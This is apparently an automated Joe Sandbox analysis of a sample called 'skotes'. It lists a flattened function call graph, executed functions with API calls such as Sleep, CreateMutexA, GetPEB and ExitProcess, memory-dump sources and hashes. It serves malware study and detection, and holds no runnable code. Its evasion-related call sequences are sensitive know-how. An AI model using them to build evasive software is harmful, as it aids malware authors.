11533->11531 11536 62d3e2 RtlAllocateHeap 11533->11536 11535 6278fb 11534->11535 11536->11539 11537->11539 11538 646c6a RtlAllocateHeap 11538->11529 11539->11527 11539->11538 11540 61a682 11541 61a68a shared_ptr 11540->11541 11542 61a75d shared_ptr 11541->11542 11543 61a949 11541->11543 11548 6280c0 RtlAllocateHeap 11542->11548 11544 61a94e 11543->11544 11545 646c6a RtlAllocateHeap 11543->11545 11546 61a953 Sleep CreateMutexA 11544->11546 11547 646c6a RtlAllocateHeap 11544->11547 11545->11544 11550 61a98e 11546->11550 11547->11546 11549 61a903 11548->11549 11551 613c8e 11552 613c98 11551->11552 11553 613cb4 11552->11553 11554 612410 5 API calls 11552->11554 11557 613810 4 API calls 11553->11557 11555 613ca5 11554->11555 11556 613ce0 RtlAllocateHeap 11555->11556 11556->11553 11558 613ccf 11557->11558 11559 613810 4 API calls 11558->11559 11560 613cdb 11559->11560 11561 627d50 RtlAllocateHeap 11560->11561 11562 613d52 11560->11562 11561->11562 11563 62d3e2 RtlAllocateHeap 11562->11563 11564 613d84 11563->11564 11565 627d50 RtlAllocateHeap 11564->11565 11567 613e03 11564->11567 11565->11567 11566 613e9b shared_ptr 11567->11566 11568 646c6a RtlAllocateHeap 11567->11568 11569 613ec1 11568->11569 11577 615a9e 11580 615a61 11577->11580 11578 6280c0 RtlAllocateHeap 11578->11580 11580->11577 11580->11578 11581 627a00 RtlAllocateHeap 11580->11581 11582 615bdd std::invalid_argument::invalid_argument 11580->11582 11583 615730 11580->11583 11581->11580 11587 615860 shared_ptr 11583->11587 11591 615799 shared_ptr 11583->11591 11584 61592a 11592 628200 11584->11592 11585 6280c0 RtlAllocateHeap 11585->11591 11588 615900 shared_ptr std::invalid_argument::invalid_argument 11587->11588 11589 646c6a RtlAllocateHeap 11587->11589 11588->11580 11590 615934 11589->11590 11591->11584 11591->11585 11591->11587 11595 62c1d9 11592->11595 11594 62820a 11598 62c15d 11595->11598 11597 62c1ea Concurrency::cancel_current_task 11597->11594 11599 6122e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11598->11599 11600 62c16f 11599->11600 11600->11597 11644 613970 11645 62c68b __Mtx_init_in_situ 2 API calls 11644->11645 11646 6139a7 11645->11646 11647 62c68b __Mtx_init_in_situ 2 API calls 11646->11647 11648 6139e6 11647->11648 11649 612170 11654 62c6fc 11649->11654 11652 62d64e RtlAllocateHeap 11653 612184 11652->11653 11655 61217a 11654->11655 11656 62c70c 11654->11656 11655->11652 11656->11655 11658 62cfbe 11656->11658 11659 62ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 11658->11659 11660 62cfd0 11659->11660 11660->11656 11661 613770 11662 61379b 11661->11662 11663 6137cd shared_ptr 11662->11663 11664 646c6a RtlAllocateHeap 11662->11664 11665 61380f 11664->11665 11666 615f76 11668 615f81 shared_ptr 11666->11668 11667 615ffe shared_ptr std::invalid_argument::invalid_argument 11668->11667 11669 646c6a RtlAllocateHeap 11668->11669 11670 61601b 11669->11670 11671 6280c0 RtlAllocateHeap 11670->11671 11672 616089 11671->11672 11673 6280c0 RtlAllocateHeap 11672->11673 11674 6160bd 11673->11674 11675 6280c0 RtlAllocateHeap 11674->11675 11676 6160ee 11675->11676 11677 6280c0 RtlAllocateHeap 11676->11677 11678 61611f 11677->11678 11679 6280c0 RtlAllocateHeap 11678->11679 11680 616150 11679->11680 11681 6165b1 shared_ptr std::invalid_argument::invalid_argument 11680->11681 11682 646c6a RtlAllocateHeap 11680->11682 11683 6165dc 11682->11683 11684 627a00 RtlAllocateHeap 11683->11684 11685 6166a6 11684->11685 11686 615c10 4 API calls 11685->11686 11687 6166ac 11686->11687 11688 615c10 4 API calls 11687->11688 11689 6166b1 11688->11689 11690 6122c0 4 API calls 11689->11690 11691 6166c9 shared_ptr 11690->11691 11692 627a00 RtlAllocateHeap 11691->11692 11693 616732 11692->11693 11694 615c10 4 API calls 11693->11694 11695 61673d 11694->11695 11696 6122c0 4 API calls 11695->11696 11705 616757 shared_ptr 11696->11705 11697 616852 11698 6280c0 RtlAllocateHeap 11697->11698 11700 61689c 11698->11700 11699 627a00 RtlAllocateHeap 11699->11705 11701 6280c0 RtlAllocateHeap 11700->11701 11703 6168e3 shared_ptr std::invalid_argument::invalid_argument 11701->11703 11702 615c10 4 API calls 11702->11705 11704 6122c0 4 API calls 11704->11705 11705->11697 11705->11699 11705->11702 11705->11704 11746 619f44 11747 619f4c shared_ptr 11746->11747 11748 61a01f shared_ptr 11747->11748 11749 61a92b 11747->11749 11752 6280c0 RtlAllocateHeap 11748->11752 11750 61a953 Sleep CreateMutexA 11749->11750 11751 646c6a RtlAllocateHeap 11749->11751 11754 61a98e 11750->11754 11751->11750 11753 61a903 11752->11753 11755 61a54d 11756 61a555 shared_ptr 11755->11756 11757 61a944 11756->11757 11759 61a628 shared_ptr 11756->11759 11758 646c6a RtlAllocateHeap 11757->11758 11760 61a949 11758->11760 11761 6280c0 RtlAllocateHeap 11759->11761 11762 61a94e 11760->11762 11763 646c6a RtlAllocateHeap 11760->11763 11764 61a903 11761->11764 11765 61a953 Sleep CreateMutexA 11762->11765 11766 646c6a RtlAllocateHeap 11762->11766 11763->11762 11767 61a98e 11765->11767 11766->11765 11780 61215a 11781 62c6fc InitializeCriticalSectionEx 11780->11781 11782 612164 11781->11782 11783 62d64e RtlAllocateHeap 11782->11783 11784 61216e 11783->11784 11805 614120 11806 61416a 11805->11806 11808 6141b2 std::invalid_argument::invalid_argument 11806->11808 11809 613ee0 11806->11809 11810 613f48 11809->11810 11814 613f1e 11809->11814 11812 613f58 11810->11812 11815 612c00 11810->11815 11812->11808 11814->11808 11816 62d3e2 RtlAllocateHeap 11815->11816 11817 612c0e 11816->11817 11825 62b847 11817->11825 11819 612c42 11820 612c49 11819->11820 11831 612c80 11819->11831 11820->11808 11822 612c58 11834 612560 11822->11834 11824 612c65 Concurrency::cancel_current_task 11826 62b854 11825->11826 11830 62b873 Concurrency::details::_Reschedule_chore 11825->11830 11837 62cb77 11826->11837 11828 62b864 11828->11830 11839 62b81e 11828->11839 11830->11819 11845 62b7fb 11831->11845 11833 612cb2 shared_ptr 11833->11822 11835 6438af ___std_exception_copy RtlAllocateHeap 11834->11835 11836 612597 std::invalid_argument::invalid_argument 11835->11836 11836->11824 11838 62cb92 CreateThreadpoolWork 11837->11838 11838->11828 11840 62b827 Concurrency::details::_Reschedule_chore 11839->11840 11843 62cdcc 11840->11843 11842 62b841 11842->11830 11844 62cde1 TpPostWork 11843->11844 11844->11842 11846 62b817 11845->11846 11847 62b807 11845->11847 11846->11833 11847->11846 11849 62ca78 11847->11849 11850 62ca8d TpReleaseWork 11849->11850 11850->11846 11871 628320 11872 628339 11871->11872 11873 62834d 11872->11873 11874 628f40 RtlAllocateHeap 11872->11874 11874->11873 11875 646729 11878 646672 11875->11878 11877 64673b 11881 64667e __dosmaperr 11878->11881 11879 646685 11880 6475f6 __dosmaperr RtlAllocateHeap 11879->11880 11882 64668a 11880->11882 11881->11879 11883 6466a5 11881->11883 11884 646c5a __cftof RtlAllocateHeap 11882->11884 11885 6466b7 11883->11885 11886 6466aa 11883->11886 11891 646695 11884->11891 11892 64a8c3 11885->11892 11887 6475f6 __dosmaperr RtlAllocateHeap 11886->11887 11887->11891 11889 6466c0 11890 6475f6 __dosmaperr RtlAllocateHeap 11889->11890 11889->11891 11890->11891 11891->11877 11893 64a8cf __dosmaperr 11892->11893 11896 64a967 11893->11896 11895 64a8ea 11895->11889 11901 64a98a 11896->11901 11897 64d82f __dosmaperr RtlAllocateHeap 11898 64a9eb 11897->11898 11899 64adf5 ___free_lconv_mon RtlAllocateHeap 11898->11899 11900 64a9d0 11899->11900 11900->11895 11901->11897 11901->11900 11905 616535 11907 616549 shared_ptr 11905->11907 11906 646c6a RtlAllocateHeap 11909 6165dc 11906->11909 11907->11906 11908 6165b1 shared_ptr std::invalid_argument::invalid_argument 11907->11908 11910 627a00 RtlAllocateHeap 11909->11910 11911 6166a6 11910->11911 11912 615c10 4 API calls 11911->11912 11913 6166ac 11912->11913 11914 615c10 4 API calls 11913->11914 11915 6166b1 11914->11915 11916 6122c0 4 API calls 11915->11916 11917 6166c9 shared_ptr 11916->11917 11918 627a00 RtlAllocateHeap 11917->11918 11919 616732 11918->11919 11920 615c10 4 API calls 11919->11920 11921 61673d 11920->11921 11922 6122c0 4 API calls 11921->11922 11931 616757 shared_ptr 11922->11931 11923 616852 11924 6280c0 RtlAllocateHeap 11923->11924 11926 61689c 11924->11926 11925 627a00 RtlAllocateHeap 11925->11931 11927 6280c0 RtlAllocateHeap 11926->11927 11929 6168e3 shared_ptr std::invalid_argument::invalid_argument 11927->11929 11928 615c10 4 API calls 11928->11931 11930 6122c0 4 API calls 11930->11931 11931->11923 11931->11925 11931->11928 11931->11930 11988 612b10 11989 612b1a 11988->11989 11990 612b1c 11988->11990 11991 62c26a 5 API calls 11990->11991 11992 612b22 11991->11992 11993 628510 11994 62855f 11993->11994 11997 62856c 11993->11997 11999 629d00 11994->11999 11996 6285c4 11997->11996 12020 62a060 11997->12020 12000 629e31 11999->12000 12003 629d25 11999->12003 12001 629270 RtlAllocateHeap 12000->12001 12012 629d8b __cftof 12001->12012 12002 646c6a RtlAllocateHeap 12011 629e3b 12002->12011 12004 629e2c 12003->12004 12005 629da1 12003->12005 12006 629d7a 12003->12006 12007 612480 RtlAllocateHeap 12004->12007 12010 62d3e2 RtlAllocateHeap 12005->12010 12005->12012 12006->12004 12008 629d85 12006->12008 12007->12000 12009 62d3e2 RtlAllocateHeap 12008->12009 12009->12012 12010->12012 12013 629e6a shared_ptr 12011->12013 12014 646c6a RtlAllocateHeap 12011->12014 12012->12002 12015 629dfc shared_ptr __cftof 12012->12015 12013->11997 12016 629e8e 12014->12016 12015->11997 12017 629ec0 shared_ptr 12016->12017 12018 646c6a RtlAllocateHeap 12016->12018 12017->11997 12019 629ee6 12018->12019 12021 62a1b1 12020->12021 12024 62a083 12020->12024 12022 629270 RtlAllocateHeap 12021->12022 12033 62a0e4 __cftof 12022->12033 12023 646c6a RtlAllocateHeap 12032 62a1bb shared_ptr 12023->12032 12025 62a1ac 12024->12025 12027 62a0d3 12024->12027 12028 62a0fd 12024->12028 12026 612480 RtlAllocateHeap 12025->12026 12026->12021 12027->12025 12029 62a0de 12027->12029 12030 62d3e2 RtlAllocateHeap 12028->12030 12028->12033 12031 62d3e2 RtlAllocateHeap 12029->12031 12030->12033 12031->12033 12032->11997 12033->12023 12034 62a16c shared_ptr __cftof 12033->12034 12034->11997 12035 62d111 12037 62d122 12035->12037 12036 62d12a 12037->12036 12039 62d199 12037->12039 12040 62d1a7 SleepConditionVariableCS 12039->12040 12042 62d1c0 12039->12042 12040->12042 12042->12037 12043 61211c 12044 612126 12043->12044 12045 62d64e RtlAllocateHeap 12044->12045 12046 612132 12045->12046 12087 613fe0 12088 614022 12087->12088 12089 6140d2 12088->12089 12090 61408c 12088->12090 12093 614035 std::invalid_argument::invalid_argument 12088->12093 12091 613ee0 4 API calls 12089->12091 12094 6135e0 12090->12094 12091->12093 12095 62d3e2 RtlAllocateHeap 12094->12095 12096 613616 12095->12096 12100 61364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 12096->12100 12101 612ce0 12096->12101 12098 61369e 12099 612c00 4 API calls 12098->12099 12098->12100 12099->12100 12100->12093 12102 612d1d 12101->12102 12103 62bedf InitOnceExecuteOnce 12102->12103 12105 612d46 12103->12105 12104 612d51 std::invalid_argument::invalid_argument 12104->12098 12105->12104 12106 612d88 12105->12106 12110 62bef7 12105->12110 12108 612440 4 API calls 12106->12108 12109 612d9b 12108->12109 12109->12098 12111 62bf03 12110->12111 12119 612900 12111->12119 12113 62bf23 Concurrency::cancel_current_task 12114 62bf73 12113->12114 12115 62bf6a 12113->12115 12117 612ae0 5 API calls 12114->12117 12129 62be7f 12115->12129 12118 62bf6f 12117->12118 12118->12106 12120 6280c0 RtlAllocateHeap 12119->12120 12121 61294f 12120->12121 12122 6126b0 RtlAllocateHeap 12121->12122 12123 612967 12122->12123 12124 61298d shared_ptr 12123->12124 12125 646c6a RtlAllocateHeap 12123->12125 12124->12113 12126 6129b6 12125->12126 12127 6438af ___std_exception_copy RtlAllocateHeap 12126->12127 12128 6129e4 12127->12128 12128->12113 12130 62cc31 InitOnceExecuteOnce 12129->12130 12131 62be97 12130->12131 12132 62be9e 12131->12132 12133 646cbb 4 API calls 12131->12133 12132->12118 12134 62bea7 12133->12134 12134->12118 12135 628de0 12136 628e05 12135->12136 12137 628f2f 12135->12137 12140 628e76 12136->12140 12141 628e4c 12136->12141 12138 629270 RtlAllocateHeap 12137->12138 12139 628f34 12138->12139 12142 612480 RtlAllocateHeap 12139->12142 12146 62d3e2 RtlAllocateHeap 12140->12146 12148 628e5d __cftof 12140->12148 12141->12139 12143 628e57 12141->12143 12142->12148 12145 62d3e2 RtlAllocateHeap 12143->12145 12144 646c6a RtlAllocateHeap 12147 628f3e 12144->12147 12145->12148 12146->12148 12148->12144 12149 628eed shared_ptr __cftof 12148->12149 12150 6285e0 12151 6285f6 12150->12151 12151->12151 12152 62860b 12151->12152 12153 628f40 RtlAllocateHeap 12151->12153 12153->12152 12154 6155f0 12155 615610 12154->12155 12156 6122c0 4 API calls 12155->12156 12157 615710 std::invalid_argument::invalid_argument 12155->12157 12156->12155 12158 6143f0 12159 62bedf InitOnceExecuteOnce 12158->12159 12161 61440a 12159->12161 12160 614411 12161->12160 12162 646cbb 4 API calls 12161->12162 12163 614424 12162->12163 12202 6121c0 12203 6121d0 12202->12203 12204 6121cb 12202->12204 12205 6121d4 12203->12205 12210 6121ec __cftof 12203->12210 12206 6475f6 __dosmaperr RtlAllocateHeap 12205->12206 12207 6121d9 12206->12207 12209 646c5a __cftof RtlAllocateHeap 12207->12209 12208 6121fc __cftof 12211 6121e4 12209->12211 12210->12208 12212 612221 12210->12212 12213 61223a 12210->12213 12215 6475f6 __dosmaperr RtlAllocateHeap 12212->12215 12214 612231 12213->12214 12216 6475f6 __dosmaperr RtlAllocateHeap 12213->12216 12217 612226 12215->12217 12218 612247 12216->12218 12219 646c5a __cftof RtlAllocateHeap 12217->12219 12220 646c5a __cftof RtlAllocateHeap 12218->12220 12219->12214 12221 612252 12220->12221 12227 6279c0 12228 6279e0 12227->12228 12228->12228 12229 6280c0 RtlAllocateHeap 12228->12229 12230 6279f2 12229->12230 12231 6283c0 12232 627760 RtlAllocateHeap 12231->12232 12233 628439 12232->12233 12234 628f40 RtlAllocateHeap 12233->12234 12235 628454 12233->12235 12234->12235 12236 628f40 RtlAllocateHeap 12235->12236 12238 6284a8 12235->12238 12237 6284ee 12236->12237 12243 6187d0 12244 6188d3 12243->12244 12252 618819 shared_ptr 12243->12252 12245 6280c0 RtlAllocateHeap 12244->12245 12251 618923 12245->12251 12246 61896c 12247 628200 RtlAllocateHeap 12246->12247 12250 618971 12247->12250 12248 618949 shared_ptr 12249 6280c0 RtlAllocateHeap 12249->12252 12251->12248 12253 646c6a RtlAllocateHeap 12251->12253 12252->12244 12252->12246 12252->12249 12252->12251 12253->12246 12294 619ba5 12295 619ba7 12294->12295 12296 627a00 RtlAllocateHeap 12295->12296 12297 619ca9 12296->12297 12298 615c10 4 API calls 12297->12298 12299 619cb1 12298->12299 12300 618b30 4 API calls 12299->12300 12301 619cc2 12300->12301 12302 628220 RtlAllocateHeap 12301->12302 12303 619cd1 12302->12303 12313 61b7b1 12314 61b7be 12313->12314 12315 627a00 RtlAllocateHeap 12314->12315 12316 61b7f3 12315->12316 12317 627a00 RtlAllocateHeap 12316->12317 12318 61b80b 12317->12318 12319 627a00 RtlAllocateHeap 12318->12319 12320 61b823 12319->12320 12321 627a00 RtlAllocateHeap 12320->12321 12322 61b835 12321->12322 12327 6467b7 12328 6467c3 __dosmaperr 12327->12328 12329 6467cd 12328->12329 12333 6467e2 12328->12333 12330 6475f6 __dosmaperr RtlAllocateHeap 12329->12330 12332 6467d2 12330->12332 12331 6467dd 12334 646c5a __cftof RtlAllocateHeap 12332->12334 12333->12331 12336 646740 12333->12336 12334->12331 12337 646762 12336->12337 12338 64674d 12336->12338 12345 64675d 12337->12345 12352 64a038 12337->12352 12339 6475f6 __dosmaperr RtlAllocateHeap 12338->12339 12340 646752 12339->12340 12342 646c5a __cftof RtlAllocateHeap 12340->12342 12342->12345 12345->12331 12348 646785 12369 64aebb 12348->12369 12351 64adf5 ___free_lconv_mon RtlAllocateHeap 12351->12345 12353 64a050 12352->12353 12357 646777 12352->12357 12354 64afe4 RtlAllocateHeap 12353->12354 12353->12357 12355 64a06e 12354->12355 12384 650439 12355->12384 12358 64b00b 12357->12358 12359 64b022 12358->12359 12361 64677f 12358->12361 12360 64adf5 ___free_lconv_mon RtlAllocateHeap 12359->12360 12359->12361 12360->12361 12362 64afe4 12361->12362 12363 64b005 12362->12363 12364 64aff0 12362->12364 12363->12348 12365 6475f6 __dosmaperr RtlAllocateHeap 12364->12365 12366 64aff5 12365->12366 12367 646c5a __cftof RtlAllocateHeap 12366->12367 12368 64b000 12367->12368 12368->12348 12370 64aecc 12369->12370 12372 64aee1 12369->12372 12371 6475e3 __dosmaperr RtlAllocateHeap 12370->12371 12375 64aed1 12371->12375 12373 64af2a 12372->12373 12376 64af08 12372->12376 12374 6475e3 __dosmaperr RtlAllocateHeap 12373->12374 12377 64af2f 12374->12377 12378 6475f6 __dosmaperr RtlAllocateHeap 12375->12378 12402 64ae2f 12376->12402 12380 6475f6 __dosmaperr RtlAllocateHeap 12377->12380 12381 64678b 12378->12381 12382 64af37 12380->12382 12381->12345 12381->12351 12383 646c5a __cftof RtlAllocateHeap 12382->12383 12383->12381 12385 650445 __dosmaperr 12384->12385 12386 65044d 12385->12386 12390 650465 12385->12390 12388 6475e3 __dosmaperr RtlAllocateHeap 12386->12388 12387 650500 12389 6475e3 __dosmaperr RtlAllocateHeap 12387->12389 12391 650452 12388->12391 12392 650505 12389->12392 12390->12387 12397 650497 12390->12397 12393 6475f6 __dosmaperr RtlAllocateHeap 12391->12393 12394 6475f6 __dosmaperr RtlAllocateHeap 12392->12394 12401 65045a 12393->12401 12395 65050d 12394->12395 12396 646c5a __cftof RtlAllocateHeap 12395->12396 12396->12401 12398 6475f6 __dosmaperr RtlAllocateHeap 12397->12398 12397->12401 12399 6504be 12398->12399 12400 6475e3 __dosmaperr RtlAllocateHeap 12399->12400 12400->12401 12401->12357 12403 64ae3b __dosmaperr 12402->12403 12404 64ae70 12403->12404 12405 64ae7b 12403->12405 12409 64af48 12404->12409 12407 6475f6 __dosmaperr RtlAllocateHeap 12405->12407 12408 64ae76 12407->12408 12408->12381 12420 64c0de 12409->12420 12411 64af58 12412 64af90 12411->12412 12413 64af5e 12411->12413 12414 64c0de RtlAllocateHeap 12411->12414 12412->12413 12415 64c0de RtlAllocateHeap 12412->12415 12416 64afd8 12413->12416 12418 6475c0 __dosmaperr RtlAllocateHeap 12413->12418 12417 64af87 12414->12417 12415->12413 12416->12408 12419 64c0de RtlAllocateHeap 12417->12419 12418->12416 12419->12412 12421 64c100 12420->12421 12422 64c0eb 12420->12422 12424 6475e3 __dosmaperr RtlAllocateHeap 12421->12424 12428 64c125 12421->12428 12423 6475e3 __dosmaperr RtlAllocateHeap 12422->12423 12425 64c0f0 12423->12425 12426 64c130 12424->12426 12427 6475f6 __dosmaperr RtlAllocateHeap 12425->12427 12429 6475f6 __dosmaperr RtlAllocateHeap 12426->12429 12431 64c0f8 12427->12431 12428->12411 12430 64c138 12429->12430 12432 646c5a __cftof RtlAllocateHeap 12430->12432 12431->12411 12432->12431 12433 616db5 12434 616dc2 12433->12434 12435 616df5 12434->12435 12436 616dca 12434->12436 12439 6280c0 RtlAllocateHeap 12435->12439 12437 6280c0 RtlAllocateHeap 12436->12437 12438 616deb shared_ptr 12437->12438 12440 616ec1 shared_ptr 12438->12440 12441 646c6a RtlAllocateHeap 12438->12441 12439->12438 12442 616ee3 12441->12442 12443 648bbe 12444 648868 4 API calls 12443->12444 12445 648bdc 12444->12445 12461 618980 12462 618aea 12461->12462 12469 6189d8 shared_ptr 12461->12469 12463 627a00 RtlAllocateHeap 12463->12469 12464 615c10 4 API calls 12464->12469 12465 618b20 12467 628200 RtlAllocateHeap 12465->12467 12466 6280c0 RtlAllocateHeap 12466->12469 12468 618b25 12467->12468 12470 646c6a RtlAllocateHeap 12468->12470 12469->12462 12469->12463 12469->12464 12469->12465 12469->12466 12469->12468 12471 618b2a 12470->12471 12503 612b90 12504 612bce 12503->12504 12505 62b7fb TpReleaseWork 12504->12505 12506 612bdb shared_ptr std::invalid_argument::invalid_argument 12505->12506 12507 613f9f 12508 613fad 12507->12508 12512 613fc5 12507->12512 12509 612410 5 API calls 12508->12509 12510 613fb6 12509->12510 12511 613ce0 RtlAllocateHeap 12510->12511 12511->12512

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 0064652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 358 64652b-646538 call 64a302 361 64655a-64656c call 64656d ExitProcess 358->361 362 64653a-646548 GetPEB 358->362 362->361 364 64654a-646559 362->364 364->361
                                                                                                                                                                    APIs
                                                                                                                                                                    • ExitProcess.KERNEL32(?,?,0064652A,?,?,?,?,?,00647661), ref: 00646567
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                    • Opcode ID: 9c7252955c13d144ced1df8430e663aac982e5516488effe1a708ca244e93187
                                                                                                                                                                    • Instruction ID: b5fd712cc64636f810010291a3ede83d059debc4d4a9b26d77bcf64d5d20b218
                                                                                                                                                                    • Opcode Fuzzy Hash: 9c7252955c13d144ced1df8430e663aac982e5516488effe1a708ca244e93187
                                                                                                                                                                    • Instruction Fuzzy Hash: 1CE08C30041508AFDF2ABB1DC809A983B2AEB03745F401C04F808CA226CB75ED91DA92
                                                                                                                                                                    Function 00619BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
